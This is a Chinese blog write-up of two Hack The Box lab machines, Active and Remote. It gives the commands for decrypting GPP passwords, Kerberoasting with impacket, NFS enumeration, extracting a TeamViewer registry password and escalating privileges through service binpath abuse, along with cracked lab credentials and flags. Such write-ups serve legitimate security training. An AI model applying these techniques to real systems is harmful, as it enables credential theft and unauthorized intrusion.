HTB-oscplike-Active+Remote

HTB-oscplike-Active+Remote

Active

    NETLOGON                                                NO ACCESS       Logon server share 
    Replication                                             READ ONLY
    SYSVOL                                                  NO ACCESS       Logon server share 
    Users                                                   NO ACCESS

直接smbclient进去Replication嗯找 最后在Groups.xml找到一段
name=“active.htb\SVC_TGS”
cpassword=“edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ”
这勾八怎么解 查了查发现是老的GPPXML可以用gpp-decrypt

gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
GPPstillStandingStrong2k18

然后以这个可以去NETLOGON、Replication、SYSVOL、Users
在User里可以直接找到flag d21ad3127a11d4f01e4fe7f2318285b4

但是到这突然就断了 思来想去重回开头开冲88端口

impacket-GetUserSPNs -dc-ip 10.10.10.100 active.htb/SVC_TGS -request
得到
$krb5tgs 23 23 23Administrator A C T I V E . H T B ACTIVE.HTB ACTIVE.HTBactive.htb/Administrator$237a9…
一堆哈希 解出来密码是 Ticketmaster1968

smbmap可以读写c$了 登上去拿到root的flag
af43ccf8848ffc369eac16a900854cfe

请添加图片描述

Remote

easy难度的remote 靶机IP 10.10.10.180
sudo nmap -sS -sV -A -p- --min-rate=1000 -Pn 10.10.10.180
21/tcp open ftp Microsoft ftpd
80/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
111/tcp open rpcbind 2-4 (RPC #100000)
135/tcp open msrpc Microsoft Windows RPC
445/tcp open microsoft-ds?
2049/tcp open mountd 1-3 (RPC #100005)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)

80进去发现是umbraco 可以searchsploit但是不知道版本
ftp和smbmap都没东西 这里删了一些细节就是111下面有nfs挂载

showmount --exports 10.10.10.180
/site_backups (everyone)
sudo mount -t nfs 10.10.10.180:/site_backups /tmp/t

然后就是嗯翻文件 其中umbraco里给了一堆骗人的东西
ping.aspx里就一句i’m alive之类的

翻翻翻后总体里面就两个收获 一个是确定了版本7.12.4
另一个是得到了用户名admin@htb.local和哈希 解出来是baconandcheese

然后用7.12.4版本的rce 这个现成的脚本有几个坑点我搞了半天
但是我不说 为什么不说 因为我没素质
连上去拿到user的flag cc2f7e8042417aa73fcdb934a2713dc1

接下来提权 进去netstat -ano看到5939端口被本地监听 PID是2304
tasklist | findstr 2304 看到是teamviewer
where.exe /R c:\ teamviewer*.* 找到路径且发现版本是7
searchsploit找不到东西 但是google可以看到
https://whynotsecurity.com/blog/teamviewer/

找到那就简单了cd HKLM:\software\wow6432node\teamviewer\version7进入注册表
get-itemproperty -path . 看到securitypasswordaes 导出来
(get-itemproperty -path .).securitypasswordaes
然后拿给的脚本解密就行了 多写两行转一下16进制即可
请添加图片描述

运行得到ff9b1c73d66bce31ac413eae131b464f582f6ce2d1e1f3da7e8d376b26394e5b
00000000: 21 00 52 00 33 00 6D 00 30 00 74 00 65 00 21 00 !.R.3.m.0.t.e.!.
00000010: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 …
None
!R3m0te!

然后5985开着 直接evil-winrm登上去就行了 拿到root的flag
c35a9bbf8c3f7a7e5ee80c62b3d62e1b

但是其实这台机子不止一种提权方法
一方面whoami /all会发现土豆一家是可以用的
但是版本是2019的 所以普通土豆不行 要用PrintSpoofer 也是可以提权的

另一方面 winpeas在扫的时候可以看到UsoSvc: AllAccess, Start
很明显是sc提权了 sc停掉服务 然后改binpath到你的shell上再启动就提权了

但是我感觉第一个提权才是他想考的 要不也太简单了

请添加图片描述

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值